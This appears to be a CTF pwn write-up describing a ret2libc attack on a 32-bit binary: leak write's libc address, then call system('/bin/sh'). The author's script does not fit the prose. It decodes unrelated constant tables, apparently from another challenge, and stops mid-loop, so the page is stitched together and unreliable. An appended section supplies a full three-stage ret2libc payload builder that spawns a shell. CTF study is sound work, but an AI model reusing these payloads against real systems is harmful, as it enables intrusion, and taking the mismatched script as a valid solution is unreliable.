How to analyze the writeup of CTF questions

11-08-2023

This is a relatively simple pwn challenge. First, load the binary into IDA and take a quick look at the program, as shown in the figure.

The read has no stack protection (no canary), so the 0x34-byte read in game can overwrite game's return address. On the first pass, overwrite it so that game returns into write(1, &write, 4), i.e. write prints the GOT entry of write, with game as write's return address. That leaks the libc address of write, from which the address of system can be computed (the challenge ships libc-2.23). Because execution returns into game and the loop runs again, a later pass can also store "/bin/sh" at 0x804A06C and then return into system with that address as its argument.

The Python exploit is as follows (the script on the page is cut off at the end):

from pwn import *


def rungameAgainPoc(p, yourname, flag):
    # Drive one round of the game: answer the name prompt, then the flag prompt.
    p.recvuntil(b"First,what's your name? ")
    p.send(yourname + b" ")
    p.recvuntil(b"doyou want to get flag? ")
    p.send(flag)


pwnelf = ELF("./pwn")
libcelf = ELF("./libc-2.23.so")

gameadd = 0x080485CB             # address of game(), reused as the return address after write()
plt_write = pwnelf.plt['write']  # the subscript was lost in extraction; write@plt is assumed from the variable name

# Stack constants as IDA shows them:
# [ebp+var_6C] 01050D02070106010206000B07010C06
# [ebp+var_4C] 02080602
# [ebp+var_5C] 0100070D020108080D000103040D0303
# [ebp+var_48] 02050009
# [ebp+var_44] 00000D02


def cover(buf):
    # IDA prints the constants most-significant byte first; reverse them into memory order.
    return bytes.fromhex(buf)[::-1]


def cover_hex_lines(buf):
    # Turn a multi-line hex dump copied from IDA into raw bytes.
    return bytes.fromhex(buf.replace("\n", "").replace("\r", "").replace(" ", ""))


var_6c = (cover("01050D02070106010206000B07010C06")
          + cover("0100070D020108080D000103040D0303")
          + cover("02080602") + cover("02050009")
          + cover("00000D02"))
# print(len(var_6c))

byte_402178 = cover_hex_lines("""02 02 02 02 03 01 01 02
01 01 02 01 01 00 01 01 02 02 00 01 01 01 01 00
01 01 02 02 00 01 01 02 02 01 01 01 01 01 02 01
01 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00
03 03 0D 04 03 01 00 0D 08 08 01 02 0D 07 00 01
06 0C 01 07 0B 00 06 02 01 06 01 07 02 0D 05 01
00 00 00 00 EF 28 68 5B 00 00 00 00 02 00 00 00
48 00 00 00 E4 22 00 00 E4 16 00 00 00 00 00 00
EF 28 68 5B 00 00 00 00 0C 00 00 00 14 00 00 00
2C 23 00 00 2C 17 00 00 00 00 00 00 EF 28 68 5B
00 00 00 00 0D 00 00 00 54 02 00 00 40 23 00 00
40 17 00 00 00 00 00 00 EF 28 68 5B 00 00 00 00
0E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 30 40 00
E0 22 40 00 01 00 00 00 E8 20 40 00 00 00 00 00
00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00""")

byte_402138 = cover_hex_lines("""00 00 00 00 01 00 00 00
02 00 00 00 03 00 00 00 04 00 00 00 05 00 00 00
06 00 00 00 07 00 00 00 08 00 00 00 09 00 00 00
0A 00 00 00 0B 00 00 00 0C 00 00 00 0D 00 00 00
0E 00 00 00 0F 00 00 00""")

dword_403018 = cover_hex_lines("""02 00 00 00 02 00 00 00
02 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00
""")

# .text:0040110E mov ecx, [ebp+var_4]
# .text:00401111 xor ecx, ebp
# .text:00401113 mov dword_40301C, 3
# .text:0040111D mov dword_403020, 6
# .text:00401127 mov dword_403024, 7
# The program overwrites these dwords at run time, so patch the static dump to match.
dword_403018 = (dword_403018[0:4] + b'\x03' + dword_403018[5:8]
                + b'\x06' + dword_403018[9:12] + b'\x07'
                + dword_403018[13:])
print(dword_403018.hex())

for i in range(0, 42):
    # Indexing a bytes object already yields an int, so no ord() is needed.
    hightnum = dword_403018[byte_402178[i] * 4]
    # The writeup breaks off here; the rest of the loop body is not on the page.
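The leak-then-system chain explained at the top of the writeup, as an added example that is not the author's script: it builds the three 0x34-byte payloads for a 32-bit binary with no canary (leak write's GOT entry through write@plt and return into game, then place "/bin/sh" at 0x804A06C, then call system). Only game at 0x080485CB, the 0x34-byte read and the 0x804A06C address come from the page; the PLT/GOT addresses, the distance from the buffer to the saved EIP, the libc offsets and the choice of read() to store the string are placeholders, and in a real run you would take them from pwntools' ELF objects.

```python
import struct

# Added example, not the writeup's exploit. Values marked "assumed" are placeholders.
GAME_ADDR   = 0x080485CB   # from the writeup: address of game()
BIN_SH_ADDR = 0x0804A06C   # from the writeup: where "/bin/sh" is stored
READ_SIZE   = 0x34         # from the writeup: bytes game() reads into its stack buffer
RET_OFFSET  = 0x1C         # assumed: distance from the buffer start to the saved EIP
WRITE_PLT   = 0x08048400   # assumed: write@plt (pwnelf.plt['write'])
READ_PLT    = 0x08048390   # assumed: read@plt (pwnelf.plt['read'])
WRITE_GOT   = 0x0804A010   # assumed: GOT slot that holds write's libc address
WRITE_OFF   = 0x000D43C0   # assumed: libcelf.symbols['write']
SYSTEM_OFF  = 0x0003A940   # assumed: libcelf.symbols['system']


def p32(v):
    return struct.pack("<I", v & 0xFFFFFFFF)


def u32(b):
    return struct.unpack("<I", b[:4])[0]


def call_frame(func, ret, *args):
    """i386 cdecl frame the callee sees after 'ret': [func][return addr][arg1][arg2]..."""
    return p32(func) + p32(ret) + b"".join(p32(a) for a in args)


def payload(chain):
    """Pad up to the saved EIP and append the frame; refuse chains the 0x34-byte read cannot deliver."""
    data = b"A" * RET_OFFSET + chain
    if len(data) > READ_SIZE:
        raise ValueError("chain needs %d bytes but read() only takes %d" % (len(data), READ_SIZE))
    return data


def stage_leak():
    # game() returns into write(1, write@got, 4); write() then returns into game() for another round.
    return payload(call_frame(WRITE_PLT, GAME_ADDR, 1, WRITE_GOT, 4))


def parse_leak(reply):
    """write() emits the 4 little-endian bytes of the GOT entry; turn them back into an address."""
    if len(reply) < 4:
        raise ValueError("short leak")
    return u32(reply)


def libc_base(leaked_write):
    base = leaked_write - WRITE_OFF
    if base & 0xFFF:
        raise ValueError("leak does not match the assumed libc offset (base not page aligned)")
    return base


def stage_write_binsh():
    # Second round: read(0, 0x804A06C, 8) stores "/bin/sh\0" from stdin, then back into game() again.
    return payload(call_frame(READ_PLT, GAME_ADDR, 0, BIN_SH_ADDR, 8))


def stage_system(base):
    # Third round: system("/bin/sh"); whatever system() returns into no longer matters.
    return payload(call_frame(base + SYSTEM_OFF, 0xDEADBEEF, BIN_SH_ADDR))


if __name__ == "__main__":
    # Constructed leak: pretend write() printed write's address in a libc mapped at 0xF7E00000.
    fake_reply = p32(0xF7E00000 + WRITE_OFF)
    base = libc_base(parse_leak(fake_reply))
    print("stage 1 (leak):   %s" % stage_leak().hex())
    print("libc base %#x, system at %#x" % (base, base + SYSTEM_OFF))
    print("stage 2 (/bin/sh): %s" % stage_write_binsh().hex())
    print("stage 3 (system): %s" % stage_system(base).hex())
```

With pwntools the three payloads are sent in successive rounds of the game loop (each one right where the script's rungameAgainPoc sends its input), the 4 bytes that come back after stage 1 go through parse_leak and libc_base, and "/bin/sh\0" is sent on stdin after stage 2 so that read() stores it at 0x804A06C. The page-alignment check in libc_base catches the common mistake of pairing the leak with offsets from the wrong libc build.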
